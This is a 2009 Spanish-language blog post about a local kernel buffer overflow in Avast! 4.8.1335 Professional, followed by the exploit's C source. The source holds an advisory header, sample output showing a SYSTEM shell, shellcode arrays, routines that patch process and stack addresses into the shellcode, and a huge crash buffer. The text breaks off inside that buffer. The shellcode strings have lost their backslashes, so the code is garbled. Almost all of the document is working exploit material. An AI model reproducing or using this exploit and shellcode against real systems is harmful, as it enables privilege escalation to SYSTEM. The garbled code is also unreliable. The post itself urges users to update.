Avast! 4.8.1335 Professional Local Kernel Buffer Overflow

Aug 25, 2009

Avast antivirus

Un nuevo exploit para Avast professsional de escalada de privilegios, parece que ni los antivirus se escapa a este tipo de fallos. Ya está dispuesta una actualización a nueva versión, es urgente dicha actualización ya que puede haber malware que se aproveche para crear backdoors.

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <tlhelp32.h>
/*
Program : avast! 4.8.1335 Professionnel
Homepage : http://www.avast.com
Discovery : 2009/07/29
Author Contacted : 2009/07/31
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]

//----- Application description

avast! antivirus software represents complete virus protection,
  offering full desktop security including a resident shield.
  This antivirus is certified by both ICSA Labs and West Coast
  Labs Checkmark.

  //----- Description of vulnerability

  The File System Filter driver is prone to a local kernel buffer overflow.
  This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
  system from a limited user account.

  //----- Proof Of Concept

  http://www.sysdream.com/LocalEscalation_Avast.rar

  //----- Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Virtualabs

//-----Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept...

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting... Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingseleveBureau>whoami
SYSTEM
###############################################
*/

char UpdateAswMon [] = {
  0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
  0x00, 0x00, 0x00
};

char ShellcodeMaster[] = "x33xf6x33xffx64xa1x24x01x00x00x8bx40x44x05x88x00"
"x00x00x8bxd0x8bx58xfcx81xfbx41x41x41x41x75x02x8b"
"xf0x83xfbx04x75x02x8bxf8x8bxd6x23xd7x85xd2x75x08"
"x8bx00x3bxc2x75xdexebx10x8bxc7xb9x40x00x00x00x03"
"xc1x8bx00x8bxdex89x04x19xbax11x11x11x11xb9x22x22"
"x22x22xb8x3bx00x00x00x8exe0x0fx35";

char RealShellcode[] = "x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x15"
"xf3x1dxb8x83xebxfcxe2xf4xe9x1bx59xb8x15xf3x96xfd"
"x29x78x61xbdx6dxf2xf2x33x5axebx96xe7x35xf2xf6xf1"
"x9exc7x96xb9xfbxc2xddx21xb9x77xddxccx12x32xd7xb5"
"x14x31xf6x4cx2exa7x39xbcx60x16x96xe7x31xf2xf6xde"
"x9exffx56x33x4axefx1cx53x9exefx96xb9xfex7ax41x9c"
"x11x30x2cx78x71x78x5dx88x90x33x65xb4x9exb3x11x33"
"x65xefxb0x33x7dxfbxf6xb1x9ex73xadxb8x15xf3x96xd0"
"x29xacx2cx4ex75xa5x94x40x96x33x66xe8x7dx8dxc5x5a"
"x66x9bx85x46x9fxfdx4ax47xf2x90x70xdcx3bx96x65xdd"
"x15xf3x1dxb8";

int GetPidByName(char * name_Proc) {
  PROCESSENTRY32 PEntry;
  HANDLE hTool32;

  PEntry.dwSize = sizeof(PROCESSENTRY32);
  hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if (hTool32 == INVALID_HANDLE_VALUE) {
    printf("nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
    getch();
    exit(0);
  }
  if(!Process32First(hTool32, &PEntry)) {
    printf("nError ==> Process32First(hTool32, &PEntry)");
    getch();
    exit(0);
  }
  if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
    printf("===> Found : %s : %dnn", PEntry.szExeFile, PEntry.th32ProcessID);
    return PEntry.th32ProcessID;
  }
  //printf( "n Process : PIDn");
  while(Process32Next(hTool32, &PEntry) != 0){
    if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
      CloseHandle(hTool32);
      printf("===> Found : %s : %dnn", PEntry.szExeFile, PEntry.th32ProcessID);
      return PEntry.th32ProcessID;
    }
    //printf("===> Trouver : %s : %dn", PEntry.szExeFile, PEntry.th32ProcessID);
  }
  printf("n%s n'a pas ete trouve.", name_Proc);
  getch();
  exit(0);
}

void MajShellcode(char * ProcessName){
  DWORD ProcessID;
  DWORD MagicWord = 0x41414141;
  int i;

  ProcessID = GetPidByName(ProcessName);
  for (i=0; i<sizeof(ShellcodeMaster); i++) {
    if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
      ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
      ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
      ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
      ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
      printf("Shellcode PID Uploaded !n");
      return;
    }
  }
  printf("Shellcode PID NOT Uploaded :'(n");
  return;
}

void MajRealShellcode(){
  int i;
  DWORD MagicWord = 0x11111111;

  for (i=0; i<sizeof(ShellcodeMaster); i++) {
    if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
      ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
      ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
      ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
      ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24;
      printf("Shellcode Redirect Uploaded !n");
      return;
    }
  }
  printf("Shellcode Redirect NOT Uploaded :'(n");
  return;
}

int FindStack(){
  __asm__(
      "mov %eax, %espnt"
      "leavent"
      "retnt"
      );
}

void MajRealStack(){
  int i;
  DWORD MagicWord = 0x22222222;
  DWORD StackLocation = FindStack();

  for (i=0; i<sizeof(ShellcodeMaster); i++) {
    if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
      ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
      ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
      ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
      ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
      printf("Shellcode Stack Uploaded !n");
      return;
    }
  }
  printf("Shellcode NOT Uploaded :'(n");
  return;
}

void AfficherListeFichiers(void) {
  HANDLE hFind;
  WIN32_FIND_DATAW FindData;
  char Dossier[1024];

  // Change de dossier
  SetCurrentDirectory(Dossier);

  // DÈbut de la recherche
  hFind=FindFirstFileW(L"*.*", &FindData);
  if (hFind!=INVALID_HANDLE_VALUE)
  {
    // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom
    printf("%wsn",FindData.cFileName);
    // Fichiers suivants
    while (FindNextFileW(hFind, &FindData))
    {
      printf("%wsn",FindData.cFileName);
    }
  }
  // Fin de la recherche
  FindClose(hFind);
}

int __cdecl main(int argc, char* argv[])
{
  HANDLE hDevice = (HANDLE) 0xffffffff;
  DWORD NombreByte;
  DWORD InitVal=0;
  char welcome[1024], out[50];
  DWORD Crashing []={
    0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
    0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
    0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
    0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
    0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
    0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
    0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
    0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
    0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
    0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
    0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
    0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
    0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
    0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
    0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
    0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
    0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,

    0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
    0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
    0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
    0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
    0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
    0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
    0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
    0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
    0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
    0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
    0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
    0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
    0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
    0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
    0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
    0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
    0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
    0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
    0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
    0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
    0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
    0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
    0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
    0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
    0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
    0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
    0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
    0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
    0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
    0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
    0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
    0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
    0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
    0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
    0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
    0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
    0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
    0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
    0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
    0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
    0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
    0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
    0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
    0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
    0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
    0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
    0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
    0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
    0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
    0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
    0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
    0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
    0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
    0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
    0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
    0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
    0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
    0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
    0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
    0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
    0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
    0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
    0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
    0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
    0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
    0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
    0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
    0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
    0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
    0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
    0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
    0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
    0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
    0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
    0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
    0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
    0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
    0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
    0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
    0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
    0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
    0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
    0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
    0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
    0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
    0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
    0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
    0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
    0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
    0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
    0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
    0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
    0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
    0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
    0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
    0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
    0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
    0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
    0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
    0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
    0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
    0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
    0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
    0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
    0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
    0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
    0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
    0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
    0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
    0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
    0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
    0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
    0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
    0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
    0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
    0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
    0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
    0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
    0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
    0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
    0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
    0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
    0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
    0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
    0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
    0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
    0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
    0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
    0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
    0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
    0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
    0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
    0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
    0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
    0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
    0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
    0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
    0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
    0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
    0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
    0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
    0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
    0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
    0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
    0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
    0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
    0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
    0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
    0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
    0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
    0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
    0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
    0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
    0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
    0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
    0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
    0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
    0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
    0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
    0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
    0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
    0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
    0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
    0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
    0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
    0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
    0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
    0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
    0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
    0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
    0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
    0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
    0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038,
    0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
    0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
    0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
    0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
    0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
    0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
    0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
    0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
    0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
    0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
    0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
    0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
    0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
    0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
    0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
    0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
    0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
    0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
    0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
    0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
    0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
    0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
    0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
    0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
    0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
    0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
    0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
    0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
    0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
    0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
    0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
    0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
    0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
    0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
    0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
    0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
    0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
    0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
    0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
    0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
    0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
    0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
    0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
    0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
    0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
    0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
    0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
    0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
    0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
    0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
    0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
    0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
    0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
    0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
    0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
    0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
    0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
    0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
    0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
    0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
    0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
    0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
    0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
    0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
    0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
    0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
    0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
    0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
    0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
    0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
    0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
    0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
    0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
    0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
    0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
    0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
    0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
    0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
    0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
    0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
    0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
    0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
    0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
    0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
    0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
    0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
    0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
    0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
    0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
    0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
    0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
    0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
    0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
    0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
    0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
    0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
    0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
    0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
    0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
    0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
    0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
    0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549,
    0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
